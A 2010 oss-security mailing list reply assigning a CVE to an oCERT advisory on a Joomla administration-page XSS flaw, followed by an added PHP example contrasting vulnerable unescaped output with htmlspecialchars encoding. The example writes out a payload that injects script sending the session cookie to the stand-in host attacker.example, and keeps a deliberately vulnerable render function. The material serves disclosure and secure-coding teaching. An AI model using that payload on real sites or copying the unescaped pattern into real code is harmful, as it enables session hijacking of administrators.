List: oss-security
Subject: Re: [oss-security] [oCERT-2010-002] Joomla input sanitization
From: Josh Bressers <bressers () redhat ! com>
Date: 2010-07-21 17:43:55
Message-ID: 297267266.1124781279734235963.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
Please use CVE-2010-2535 for this.
Thanks.
--
JB
----- "Andrea Barisani" <lcars@ocert.org> wrote:
> #2010-002 Joomla input sanitization errors (XSS)
>
> Description:
>
> Joomla, an open source content management system, suffers from a
> cross-site scripting (XSS) vulnerability.
>
> Insufficient input sanitization on the parameters passed to pages related
> to administration settings leads to arbitrary JavaScript injection in the
> context of the user session; this could potentially be exploited to hijack
> the session of the Joomla administrator.
>
> Affected version:
>
> Joomla <= 1.5.19
>
> Fixed version:
>
> Joomla >= 1.5.20
>
> Credit: vulnerability report and PoC received from Mesut Timur
> <mesut [at] mavitunasecurity [dot] com>.
>
> CVE: N/A
>
> Timeline:
>
> 2010-06-01: vulnerability report received
> 2010-06-01: contacted Joomla Security Team
> 2010-07-15: Joomla advisory published
> 2010-07-20: oCERT advisory published
>
> References:
> http://developer.joomla.org/security/news/318-20100704-core-xss-vulnerabilitis-in-back-end.html
>
> Permalink:
> http://www.ocert.org/advisories/ocert-2010-002.html
>
> --
> Andrea Barisani | Founder & Project Coordinator
> oCERT | Open Source Computer Emergency Response Team
>
> <lcars@ocert.org> http://www.ocert.org
> 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
> "Pluralitas non est ponenda sine necessitate"
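The mechanism the advisory describes (a request parameter reflected unencoded into an administration page, giving script execution in the administrator's session) in a minimal form. This is an added example, not Joomla's code and not the code from the oCERT or Joomla advisories; the page name, the `search` parameter, the function names and the payload are assumptions for illustration only.

```php
<?php
// Added example (not Joomla code): a minimal admin "settings" page that
// reflects a request parameter back into HTML, first unescaped, then with
// output encoding.  Page name, parameter name and payload are assumptions.

declare(strict_types=1);

// --- Vulnerable form ---------------------------------------------------
// The value of ?search= is echoed verbatim into the page.  If an attacker
// lures a logged-in administrator into opening a link carrying a crafted
// search value, the injected script runs in the administrator's session.
function render_settings_vulnerable(string $search): string
{
    return '<h1>Settings</h1>'
         . '<form method="get">'
         . '<input name="search" value="' . $search . '">'
         . '</form>'
         . '<p>Showing settings matching: ' . $search . '</p>';
}

// --- Hardened form -----------------------------------------------------
// Encode for the HTML context at the point of output.  ENT_QUOTES also
// encodes single quotes so the attribute value above cannot be broken out
// of; the explicit charset avoids encoder/decoder mismatches.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_settings_hardened(string $search): string
{
    return '<h1>Settings</h1>'
         . '<form method="get">'
         . '<input name="search" value="' . h($search) . '">'
         . '</form>'
         . '<p>Showing settings matching: ' . h($search) . '</p>';
}

// --- Demonstration with a constructed payload ---------------------------
// Closes the open attribute, then injects a script that ships the session
// cookie to an attacker-controlled host (hostname is a placeholder).
$payload = '"><script>document.location="http://attacker.example/?c="'
         . '+document.cookie</script>';

$vuln = render_settings_vulnerable($payload);
$safe = render_settings_hardened($payload);

// The vulnerable output contains a live <script> tag; the hardened output
// contains only the encoded text &lt;script&gt;.
printf("vulnerable page has <script>: %s\n",
       strpos($vuln, '<script>') !== false ? 'yes' : 'no');
printf("hardened page has <script>:   %s\n",
       strpos($safe, '<script>') !== false ? 'yes' : 'no');
echo $safe, PHP_EOL;
```

Run it with `php example.php`. Note that encoding is context specific: `htmlspecialchars` is correct for HTML element and attribute contexts, but a value placed inside a JavaScript block, a URL or a CSS rule needs the encoder for that context. Marking the session cookie `HttpOnly` (PHP's `session.cookie_httponly`) blunts the cookie-theft variant shown here, but script running in the administrator's page can still issue authenticated requests, so it is defence in depth, not a substitute for output encoding.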